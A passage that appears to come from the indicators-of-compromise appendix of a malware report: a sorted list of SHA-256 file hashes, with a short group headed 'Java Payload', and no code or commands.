      b2a08ce7b2e724333c447650e7ebbeb207c690178574115e0b97cfe0d8b70e15
      b4d061e5c25f8dafedf3cb7f1a847ec7d15f7657edf2fe52929480a5831ce558
      b660d3af609a43f62ee09db6d4fd2ced17dfe6103ef6b7ef518ef054ec8b0600
      b66e51aaa6e9825374e299c79b717d078b00cfb4e62626c47a6d8c80e21ac52c
      b7190b6662966a5fd04c4b604b50139312d4c57fcfc5168d55f21c27e8973344
      b75a3a2d954119a673cfcd303dca027da418006d19cbe46464d90a908fa1490b
      b760c929a74461918567105db0b2a15991c20c241b599edbd2d0eef08a73d69f
      b8380a1541007fea7ed9aac2dbea21b3504f7bdafc032f95790df2f51a9bcbee
      ba1cfc758e4569e3771a02d51c3d4ba7afec8b53db96242d2452342d7eeec875
      ba3128b66e81f74fa160445d5bd4c42b7891cf9f7427ffd6e84d7afdcd5a3667
      ba5aa059277b263866237d9dbb07d7ac8cd1d0d1366ee0f1f56e7d39ebf9a14a
      bb5989d1f78cdf6a3c06950d1a74bd0b41f34282c30d135e4cf47107210fe71b
      bb8e8ee7c848f7b483ce2e9b6a44bcf12a22d2f3a6c44577ff1b94eb835bb27a
      bbde3ab8e47481635f32406d6826a3969ecf87a1c9bce746d688b980db183063
      bde29046c392e9d7ba333a97dc83001fdd76445bbe090bcf07d10eda843ead74
      c00bccd91968a0e0dcdaddf5b3c46c0b84763b42c6b2cf190e4028df7f6a2d61
      c05a603e3b88399c67fab5fab3df27a7ebf39082c9189ebca7ef7ad5ad1c6cd6
      c1feb9bc7c59ca15a117f844452ec93ac0019d8d5fb35fd32b1264dfba75cde4
      c23777e5fc6d93ba8fce9f72400627e12a501d876db37abd2efdec6042177d5f
      c289d754bb9c04b45e9730b1f618e26b9162119ec25043cd27322ed6ebc34b86
      c6f13ad844d496642c6fc89a6bfdc2fd2067babe71085043307875b6cdcaef4e
      c71899e92dfbf4843511fddc1e15b2623957aefc8b67ba986fdc30176e6f7eb2
      c7bfe9228ad771a4134c23488f62d7561a8275a88479547d9f6b1e1a4687e999
      c868f5a185f650529a5097bd9ee04c2557ece354418b85ac79f32e315177bb3e
      c8c4148e7e2824d4bbe0fd54908fb4dd400503ff2c1a7c6faa7cf34613575ea6
      c938cdba2794c0c0899a99c6ceecb3bb9eb515bbc83c2248245d72bc7b15a111
      c9c61bca518170b3a4c894620a152dbe4902593639e007ac817d72a5b947a288
      cc32182b850b8f1297746ce3321ea5612a9143aa4870eae6388c5f6c618a1eb5
      ce022e9556b4cf0bc90bebc4d2c6a11a2367965b10af0639c638a91649db56e9
      ce54c4f74e7064d28a07970fc8c99723c2f9d2f68bf5aef787cf2e5fd644d088
      d1bd4ce6d4d3c38380b676201b6dc77b56ec209ad34247a223a4fe9616e72189
      d275dfed656a884b20558526463d8daa145c5d49f8b3619847ce98810dfd21a8
      d2a627bdaf8835211d5cd12b00bfe9d2f9ffab538946c0346e0a06c3524fd90d
      d3ebff1bbb4ceb04b901897db2b62962fb4cdf3ebef84ecc50e218c71c8178c6
      d4eb694450490c87dc688d228cb5f18bce25f1e2993882a1f1cc20464a61216f
      d53ae69f28940bfccf9ef0e900c9fad9948e0a57fcbec050ad361d1233dd67cc
      d797190dee156d67c101546e125ee7d86b05cd20e26fa2fce522048678201ea7
      d7ea65296e00a373462bf992e08217e961212a639f5dbbd74b96c29fe1b04a31
      dab4a1d3767be0bdfa2fb232cf4cdae80821b8b7b942fe7c98f7f6169a5a5abe
      dba0d1bdc062c5db3373aa31fbc7fc5a0dd9f6c2e3b46b1c671f8daab5ab8200
      dc7b5e7b3b8fd07ab00db297d122c8b326bb206610e685d7f95dabf87957cce6
      de39323998aed531a281f7166e9db6ebc85524a596ef2bfce3719dfdc0863eed
      de86474c0da9cb8093a8af97d20353c98d3665f2f84962e312ca3dd58edfdb1c
      e13f386beb95724a5b392e6870bc583bc10904467b29a6de8943ff29003bd460
      e2cc79e2348677a7a307497242a24216bec0c19f174e1de8f16f54fb64807a47
      e36283ab07e1528223983bcab815274a2c88997470c31daae5ed190171c8b7b1
      e50db1c8ceece1221efd8a7dc73fbb4a80dc980903f3f47d0673b813afcbcabc
      e5d3890aaa15dc7ce4ac1e9c009462a9cd4ad4b7bdfd646b036dbf97b2ba8e43
      e6d0b74abbb00bb8f49303041cb230ced394a1fe790b0c43423dec3e7b16f5c9
      e7c7d4092a9815f975f7660cf2e68ee026788b100efacb9ae9fd8aace4ea5a7e
      e81ce4a4d92efa16e8c7e3247bc88920196a9c005db127388b8ab80a9337d416
      eab1828a4a4432efba988cd17e8ab8c78ce9d9f00a184f9f62266ea6edb32a8e
      ef60ca30ac8cf1a1895120ce3707084314b653d41eaad0a706f7a93192e37bc5
      ef6cc3be0a91184b5748d5e184d30732981d49f39982c9ecfdb5069b15d5507b
      f3bdc2c1b7e520e42143f0d30e12f4e4b3de23b0f437846ba23e00ac2dc977e8
      f4464191d6b4056a1fd87c474d0908d4820110e1dab8925d0163b49a0bda1807
      f5b38ac9ac9a42a3558f6c8aab40569e27f3128843a1b090542076bc75e1eb26
      f607ec98a76e2e46caa6b692998aab0d8f06197ea2d0ea79bd1ff1dc1bfe47b0
      f6d86622dd5f013072fd82e2fe25f0874db701d3289ed0a1ab2bdc2d712b6a7c
      f87759062ab0a7039c7c9dd3131e3b5524b37b72add1e0c41c5e414e1de8ef32
      f93fbd2205f2e787e92af4eaa4467ed0f29aa48cfabcbeb7f923573553074269
      f94a4938c1d8caaec9114cb10c497833fea0c7c3ae4c7639213e73d1b02a0376
      f9700d80095ca548e7005c6783fc14446d685dae8cd73757df5be051b06ec305
      fa292d6024b47233f67b3ecfa58919cf79c8c06e43d7faa6a4a16c7088ece9d3
      fe4bad3464d5f3fe17618ecb4e61d8d26be234ce86c967c7ea99f043f86ad363
      fec6e6b73ee3df52c806acfaaac7cc69b28b0ed305f23856673d7500fdf55d6a
      ff14275071170c594d03e4462f8144c91e7483e037c223f561f3784e0659b5c8
      ff612c60c2fe5411dbf88ba3a4f923ec80d17d744be8752f82a8f15c9c6344ff

      Java Payload

      0a2f74a7787ae904e5a22a3c2b3acf0316c10b95fae08cced7ca5e2fcc7d9bf8
      0af2c5a46df16b98b9ab5af0ec455e98f6e1928c10ed8b6ffec69573498bdd8a
      65220dae459432deb1b038dbcbf8a379519a1a797b7b72f6408f94733bc5a2c2
      93280872f685f9c26d5f668ca1303f224a38d2b86ba707cdbb3d57427396e752
      93a482e554e2a37e6893fdd8cd92537c0ebc7363ac5fac44b7a4af4a2088ea24